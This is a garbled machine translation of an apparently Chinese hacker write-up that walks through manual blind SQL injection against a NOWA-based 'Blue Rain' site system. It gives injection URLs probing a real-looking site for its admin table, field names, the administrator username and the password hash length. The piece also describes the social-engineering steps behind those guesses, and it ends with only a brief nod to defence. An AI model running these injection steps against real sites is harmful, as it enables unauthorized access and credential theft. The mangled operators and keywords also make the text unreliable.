It was originally submitted by the article. Because the manuscript problem, I couldn't get a magazine. In addition, some people recently said that the three four guessing the problem of the guessing blue rain, so I made the loophole of the public vulnerability warning. Tap the version, of course, some SQL injection vulnerabilities have been existed so far, so everything has nothing to do with me and the BCT team.
Recently bored, walking around and see. Discovering the current whole station system, more and more, modified version, etc. N more A! And the users of the blue rain design are also more and more, and the Blue Rain Site System is revised from NOWA 0.94! NOWA-based system is not only a lot of blue rain! I will not list it here, the core is the same, but the additional function of the program is different! Safety is only uploaded because of NOWA-based systems so that the vulnerabilities you know are only uploaded. The following article will appear in the NOWA modification system vulnerability, and there is no SQL injection vulnerability! I don't want to inject problems when I blame the blue rain modification. Can you blame me! Who told people that the programmer does not pay attention to the safety dead angle?
1. Determine the injection point. We will test the official website because it is concerned that the version provided is not the latest version leads to the correctness of the article. First we submit http: //***.net/view.asp? Action = Art & Art_ID = 70 and 1 = 1 Returns the following information. Enter http: //**.net/view.asp? Action = Art & Art_ID = 70% 20and% 201 = 2 Return to the following information Detects and1 = 1 and And 1 = 2D information from the standard SQL injection point to see The procedures of the two images are SQL injection, because now NOWA-based modified version is based on the Access database architecture, so we can further determine the database type of this program.
Second, guess the database table because I lazy, I have to use NBSI to make SQL injection work, how do you know if the NBSI is too powerful, can't kill chicken with a cow knife. It didn't detect that there is a SQL injection in the SQL injection point I have found! It's too surprising (hak_ban: Really ... I really want to manually inject T_T) nbsi too gave a face! So I have to take manually injective scalp. First specify whether the table of the database exists in the database. Construct the statement submit http://***.net/view.asp? Action = Art & Art_ID = 70% 20and% 200 ???? (select% 20count (*)% 20FROM% 20ADMIN) The database administrator in the program Table, not the name of admin, adminuser user, so we can know if we grasp the psychological psychology of the executive author. After submitting the statement, the page returns to normal, we can determine that the database is existed when there is admin. We just need admin's password and account, so other tables in the database can be ignored.
Third, guess the database field before guessing more troubles and unnecessary suspects, you should have some information on the invasive website, such as the administrator's QQ and the screen name used by the administrator. To know, because we usually use the passwords and accounts that are easy to remember, so that you can forget yourself. Find the article page, etc. Function page can't find the article editing and the administrator's QQ number. I have to find it in BBS, very fortunately, we found "Blue Rain" user name in BBS, so waiting for the admin account, we can try Chinese names or pinyin letters. (Hak_ban: I used to look through the PLMM character and birthday at MSN. Everyone should pay attention to the importance of social engineering.) There is less nonsense, what is the administrator field of this program! ? First, I guess the name of Name http: //**.net/view.asp? Action = Art & Art_ID = 70% 20and% 201 = (select% 20count (*)% 20FROM% 20Admin% 20where% 20LEN (Name ) ?? 0) (HAK_BAN: * _ * is not A! Not a Name field A) After submitting statement, the information returns to the page display is not normal to confirm that there is no Name in the Admin table. It seems that I have to think about how to guess, since the Name field can't do it, try the admin_name field! Re-construct the guess field: http://***.net/view.asp? Action = Art & Art_ID = 70% 20And% 201 = (SELECT% 20count (*)% 20FROM% 20ADMIN% 20where% 20LEN (admin_name)? ? 0) (HAK_BAN: This is the next time? I will take a step!) After submitting the statement, the page returns to normal, which is finally possible. Then, we started to guess the PASSWORD field, in fact, look at the back of the above, we can very certainly say that the password field is admin_password, so the submitted statement is http: //**.net/view.asp? Action = Art & ART_ID = 70% 20And% 201 = (Select% 20count (*)% 20FROM% 20Admin% 20where% 20LEN (admin_password) ?? 0) The message returns to normal right! ? Hahaha, said that the whole guess here is almost finished! (Rookie: What is it? Is there an account and password? Is you still stupid?) Guess the password and account is more trouble and waste time! Ok, let's take a look at the account and password. First we guess the length of the account! Suppose, we have got the name "Blue Rain" of the administrator's commonly used account name "Blue Rain" is an administrator account. We have two possibilities, one is the pinyin "lanyu" of blue rain, and the second is the Chinese transformation of blue rain to the ASCII code to guess. Let's first try the possibility of this pinyin. If you are like this, we have to construct the length of the admin_name of 5, so the submission statement is http: //***.net/view.asp? Action = Art & Art_ID = 70% 20and % 201 = (select% 20count (*)% 20FROM% 20ADMIN% 20where% 20LEN (admin_name) ?? 5) The page information returns to not display properly.
Then submit http://fj126.net/view.asp?action=art&art_id=70 and 1= (select count(- ) From ADMIN Where len (ADMIN_NAME) ??4) This subpage page It can be normal! Then submit the statement again to http: //**.net/view.asp? Action = Art & Art_ID = 70% 20And% 201 = (select% 20count (*)% 20FM% 20ADMIN% 20where% 20LEN (admin_name) = 5) We can determine that the length of admin_name is 5. The account length came out, and the length of Password we still don't know. According to the information collection, you can use the MD5 16-bit encryption, so we can guess the length of 16! Submission statement http://***.Net/view.asp? Action = Art & ART_ID = 70% 20And% 201 = (select% 20count (*)% 20FROM% 20Admin% 20where% 20LEN (admin_password) = 16) This is not Screenshot! We can basically know! The account length is 5, the password length is 16 bits. (HAK_BAN: Say really, I haven't been manual for a long time, I'm almost my back pain!) As for the account, how much password is, I will no longer list it! The administrator account obtained by testing the new social engineering is: Lanyu is correct! The password is indeed MD516 bit encryption. The whole process can use the smelly CSC to inject the test! Fourth, there are several SQL injection pages that summarizes the entire program, all of which are based on the function page of Blue Rain, which is not related to the relevant SQL injection. If you have this program, you can use generic to prevent injection. The script is prevented, although MD5 requires violent crack, but if you really think about it, don't say crack. Maybe your website will be done by others, network security is a very important part, I hope everyone should not underestimate the security of this! If you have any mistakes, please point out, what is the problem can go to a non-secure forum or a BCT group to find me!